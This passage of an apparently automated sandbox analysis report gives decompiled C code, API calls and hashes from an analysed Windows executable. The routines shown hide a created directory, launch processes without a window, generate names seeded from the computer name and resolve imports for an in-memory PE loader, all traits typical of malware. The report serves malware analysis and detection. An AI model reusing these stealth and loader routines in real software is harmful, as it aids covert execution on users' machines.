                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                    • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                    • API String ID: 1900561814-3657104962
                    • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                    • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                    • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                    • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
				void* _t15;
				WCHAR* _t17;

				CreateDirectoryW(_a4, 0);
				if(SetCurrentDirectoryW(_a4) == 0) {
					L2:
					return 0;
				}
				_t17 = _a8;
				CreateDirectoryW(_t17, 0);
				if(SetCurrentDirectoryW(_t17) != 0) {
					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
					if(_a12 != 0) {
						_push(_t17);
						swprintf(_a12, L"%s\\%s", _a4);
					}
					_t15 = 1;
					return _t15;
				}
				goto L2;
			}





                    0x00401b07
                    0x00401b16
                    0x00401b27
                    0x00000000
                    0x00401b27
                    0x00401b18
                    0x00401b1e
                    0x00401b25
                    0x00401b36
                    0x00401b40
                    0x00401b42
                    0x00401b4e
                    0x00401b54
                    0x00401b59
                    0x00000000
                    0x00401b59
                    0x00000000

                    APIs
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                    • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Directory$AttributesCreateCurrentFile$swprintf
                    • String ID: %s\%s
                    • API String ID: 1036847564-4073750446
                    • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                    • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                    • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                    • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63processsynchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;
				memset( &(_v88.lpReserved), 0, _t32 << 2);
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;
				_v88.dwFlags = _t37;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return _t37;
			}







                    0x00401070
                    0x00401074
                    0x0040107d
                    0x00401082
                    0x00401085
                    0x00401086
                    0x00401087
                    0x0040108d
                    0x0040108e
                    0x004010a1
                    0x004010b0
                    0x00000000
                    0x004010f7
                    0x004010b5
                    0x004010c5
                    0x004010cc
                    0x004010cc
                    0x004010d5
                    0x004010dd
                    0x004010dd
                    0x004010d5
                    0x004010ec
                    0x004010f1
                    0x00000000

                    APIs
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                    • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                    • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                    • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                    • CloseHandle.KERNEL32(?), ref: 004010EC
                    • CloseHandle.KERNEL32(?), ref: 004010F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                    • String ID: D
                    • API String ID: 786732093-2746444292
                    • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                    • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                    • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                    • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}





























                    0x004077bd
                    0x004077bf
                    0x004077c4
                    0x004077cf
                    0x004077d0
                    0x004077dd
                    0x004077e2
                    0x004077e7
                    0x004077ee
                    0x004077f5
                    0x004077fc
                    0x00407802
                    0x00407808
                    0x0040780a
                    0x00407810
                    0x00407816
                    0x0040781f
                    0x00407824
                    0x00407829
                    0x0040782f
                    0x00407836
                    0x0040783c
                    0x0040783d
                    0x00407842
                    0x00407847
                    0x0040784c
                    0x00407851
                    0x00407856
                    0x0040786f
                    0x00407875
                    0x0040787a
                    0x0040787f
                    0x0040788c
                    0x0040788e
                    0x00407894
                    0x004078d0
                    0x004078d0
                    0x004078d3
                    0x00000000
                    0x00000000
                    0x004078d5
                    0x004078d6
                    0x004078d6
                    0x00407896
                    0x00407896
                    0x00407896
                    0x00407897
                    0x0040789a
                    0x0040789c
                    0x004078a7
                    0x004078a9
                    0x004078a9
                    0x004078aa
                    0x004078aa
                    0x004078a7
                    0x004078ad
                    0x004078ad
                    0x004078b1
                    0x00000000
                    0x00000000
                    0x004078b7
                    0x004078be
                    0x004078c4
                    0x004078c8
                    0x004078dd
                    0x004078ca
                    0x004078ca
                    0x004078ca
                    0x004078e9
                    0x004078ee
                    0x004078f2
                    0x004078f8
                    0x004078fd
                    0x004078ff
                    0x00407902
                    0x00407903
                    0x00407904
                    0x0040790b

                    APIs
                    • __set_app_type.MSVCRT(00000002), ref: 004077E7
                    • __p__fmode.MSVCRT ref: 004077FC
                    • __p__commode.MSVCRT ref: 0040780A
                    • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                    • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                    • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                    • String ID:
                    • API String ID: 3626615345-0
                    • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                    • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                    • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                    • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00407831(CHAR* __ebx) {
				void* _t19;
				void _t21;
				intOrPtr _t28;
				signed int _t30;
				int _t32;
				intOrPtr* _t33;
				intOrPtr _t34;
				CHAR* _t35;
				intOrPtr _t38;
				intOrPtr* _t41;
				void* _t42;

				_t35 = __ebx;
				__setusermatherr(E0040793C);
				E0040792A(_t19);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t21 =  *0x40f940; // 0x0
				 *(_t42 - 0x6c) = _t21;
				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t41 =  *_acmdln;
				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
				if( *_t41 != 0x22) {
					while(1) {
						__eflags =  *_t41 - 0x20;
						if(__eflags <= 0) {
							goto L6;
						}
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				} else {
					do {
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
						_t34 =  *_t41;
					} while (_t34 != _t35 && _t34 != 0x22);
					if( *_t41 == 0x22) {
						L5:
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				}
				L6:
				_t28 =  *_t41;
				if(_t28 != _t35 && _t28 <= 0x20) {
					goto L5;
				}
				 *(_t42 - 0x30) = _t35;
				GetStartupInfoA(_t42 - 0x5c);
				_t52 =  *(_t42 - 0x30) & 0x00000001;
				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
					_t30 = 0xa;
				} else {
					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
				}
				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
				 *(_t42 - 0x68) = _t32;
				exit(_t32);
				_t33 =  *((intOrPtr*)(_t42 - 0x14));
				_t38 =  *((intOrPtr*)( *_t33));
				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
				_push(_t33);
				_push(_t38);
				L0040791E();
				return _t33;
			}














                    0x00407831
                    0x00407836
                    0x0040783d
                    0x00407842
                    0x00407847
                    0x0040784c
                    0x00407851
                    0x00407856
                    0x0040786f
                    0x00407875
                    0x0040787a
                    0x0040787f
                    0x0040788c
                    0x0040788e
                    0x00407894
                    0x004078d0
                    0x004078d0
                    0x004078d3
                    0x00000000
                    0x00000000
                    0x004078d5
                    0x004078d6
                    0x004078d6
                    0x00407896
                    0x00407896
                    0x00407896
                    0x00407897
                    0x0040789a
                    0x0040789c
                    0x004078a7
                    0x004078a9
                    0x004078a9
                    0x004078aa
                    0x004078aa
                    0x004078a7
                    0x004078ad
                    0x004078ad
                    0x004078b1
                    0x00000000
                    0x00000000
                    0x004078b7
                    0x004078be
                    0x004078c4
                    0x004078c8
                    0x004078dd
                    0x004078ca
                    0x004078ca
                    0x004078ca
                    0x004078e9
                    0x004078ee
                    0x004078f2
                    0x004078f8
                    0x004078fd
                    0x004078ff
                    0x00407902
                    0x00407903
                    0x00407904
                    0x0040790b

                    APIs
                    • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                      • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                    • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                    • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                    • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                    • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                    • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                    • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                    • String ID:
                    • API String ID: 2141228402-0
                    • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                    • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                    • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                    • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E004027DF(signed int* _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _t50;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t58;
				void _t60;
				signed int _t63;
				signed int _t67;
				intOrPtr _t68;
				void* _t73;
				signed int _t75;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t90 = _a4;
				_t2 = _t90 + 4; // 0x4be8563c
				_t87 =  *_t2;
				_t50 =  *_t90 + 0x80;
				_t75 = 1;
				_v16 = _t87;
				_v12 = _t75;
				if( *((intOrPtr*)(_t50 + 4)) != 0) {
					_t73 =  *_t50 + _t87;
					if(IsBadReadPtr(_t73, 0x14) != 0) {
						L25:
						return _v12;
					}
					while(1) {
						_t53 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t53 == 0) {
							goto L25;
						}
						_t8 = _t90 + 0x30; // 0xc085d0ff
						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
						_v8 = _t55;
						if(_t55 == 0) {
							SetLastError(0x7e);
							L23:
							_v12 = _v12 & 0x00000000;
							goto L25;
						}
						_t11 = _t90 + 0xc; // 0x317459c0
						_t14 = _t90 + 8; // 0x85000001
						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
						if(_t58 == 0) {
							_t40 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
							SetLastError(0xe);
							goto L23;
						}
						_t15 = _t90 + 0xc; // 0x317459c0
						 *(_t90 + 8) = _t58;
						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
						_t60 =  *_t73;
						if(_t60 == 0) {
							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
							_a4 = _t88;
						} else {
							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
							_a4 = _t60 + _t87;
						}
						while(1) {
							_t63 =  *_a4;
							if(_t63 == 0) {
								break;
							}
							if((_t63 & 0x80000000) == 0) {
								_t32 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t32);
								_t67 = _t63 + _v16 + 2;
							} else {
								_t30 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t30);
								_t67 = _t63 & 0x0000ffff;
							}
							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
							_t91 = _t91 + 0xc;
							 *_t88 = _t68;
							if(_t68 == 0) {
								_v12 = _v12 & 0x00000000;
								break;
							} else {
								_a4 =  &(_a4[1]);
								_t88 = _t88 + 4;
								continue;
							}
						}
						if(_v12 == 0) {
							_t45 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
							SetLastError(0x7f);
							goto L25;
						}
						_t73 = _t73 + 0x14;
						if(IsBadReadPtr(_t73, 0x14) == 0) {
							_t87 = _v16;
							continue;
						}
						goto L25;
					}
					goto L25;
				}
				return _t75;
			}




















                    0x004027e6
                    0x004027ee
                    0x004027ee
                    0x004027f1
                    0x004027f6
                    0x004027f7
                    0x004027fa
                    0x00402801
                    0x0040280d
                    0x0040281a
                    0x0040291c
                    0x00000000
                    0x0040291f
                    0x00402825
                    0x00402825
                    0x0040282a
                    0x00000000
                    0x00000000
                    0x00402830
                    0x00402836
                    0x0040283a
                    0x00402840
                    0x004028fd
                    0x004028fd
                    0x00402903
                    0x00000000
                    0x00402903
                    0x00402846
                    0x00402851
                    0x00402854
                    0x0040285e
                    0x004028f0
                    0x004028f6
                    0x004028fd
                    0x00000000
                    0x004028fd
                    0x00402864
                    0x0040286a
                    0x0040286d
                    0x00402870
                    0x00402873
                    0x00402877
                    0x00402889
                    0x0040288b
                    0x00402879
                    0x0040287e
                    0x00402881
                    0x00402881
                    0x0040288e
                    0x00402891
                    0x00402895
                    0x00000000
                    0x00000000
                    0x0040289c
                    0x004028ab
                    0x004028ab
                    0x004028b0
                    0x0040289e
                    0x0040289e
                    0x0040289e
                    0x004028a1
                    0x004028a1
                    0x004028b7
                    0x004028ba
                    0x004028bd
                    0x004028c1
                    0x004028cc
                    0x00000000
                    0x004028c3
                    0x004028c3
                    0x004028c7
                    0x00000000
                    0x004028c7
                    0x004028c1
                    0x004028d4
                    0x00402909
                    0x0040290f
                    0x00402916
                    0x00000000
                    0x00402916
                    0x004028d6
                    0x004028e4
                    0x00402822
                    0x00000000
                    0x00402822
                    0x00000000
                    0x004028ea
                    0x00000000
                    0x00402825
                    0x00000000

                    APIs
                    • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                    • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                    • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Read$realloc
                    • String ID: ?!@
                    • API String ID: 1241503663-708128716
                    • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                    • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                    • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                    • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00401225(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void _v410;
				long _v412;
				long _t34;
				signed int _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t71;
				signed short* _t72;
				void* _t76;
				void* _t77;

				_t34 =  *0x40f874; // 0x0
				_v412 = _t34;
				_t56 = 0x63;
				_v12 = 0x18f;
				memset( &_v410, 0, _t56 << 2);
				asm("stosw");
				GetComputerNameW( &_v412,  &_v12);
				_v8 = _v8 & 0x00000000;
				_t54 = 1;
				if(wcslen( &_v412) > 0) {
					_t72 =  &_v412;
					do {
						_t54 = _t54 * ( *_t72 & 0x0000ffff);
						_v8 = _v8 + 1;
						_t72 =  &(_t72[1]);
					} while (_v8 < wcslen( &_v412));
				}
				srand(_t54);
				_t42 = rand();
				_t71 = 0;
				asm("cdq");
				_t60 = 8;
				_t76 = _t42 % _t60 + _t60;
				if(_t76 > 0) {
					do {
						_t48 = rand();
						asm("cdq");
						_t62 = 0x1a;
						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
						_t71 = _t71 + 1;
					} while (_t71 < _t76);
				}
				_t77 = _t76 + 3;
				while(_t71 < _t77) {
					_t45 = rand();
					asm("cdq");
					_t61 = 0xa;
					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
					_t71 = _t71 + 1;
				}
				_t44 = _a4;
				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
				return _t44;
			}





















                    0x0040122e
                    0x00401239
                    0x00401240
                    0x00401249
                    0x00401250
                    0x00401252
                    0x0040125f
                    0x0040126b
                    0x00401277
                    0x0040127e
                    0x00401280
                    0x00401286
                    0x00401289
                    0x0040128c
                    0x00401297
                    0x0040129d
                    0x00401286
                    0x004012a1
                    0x004012ae
                    0x004012b2
                    0x004012b4
                    0x004012b5
                    0x004012ba
                    0x004012be
                    0x004012c0
                    0x004012c0
                    0x004012c4
                    0x004012c5
                    0x004012ce
                    0x004012d1
                    0x004012d2
                    0x004012c0
                    0x004012d6
                    0x004012d9
                    0x004012dd
                    0x004012e1
                    0x004012e2
                    0x004012eb
                    0x004012ee
                    0x004012ee
                    0x004012f1
                    0x004012f4
                    0x004012fc

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: rand$wcslen$ComputerNamesrand
                    • String ID:
                    • API String ID: 3058258771-0
                    • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                    • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                    • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                    • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00407070(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t16 = _t31[1];
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E00407070(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}












                    0x0040707a
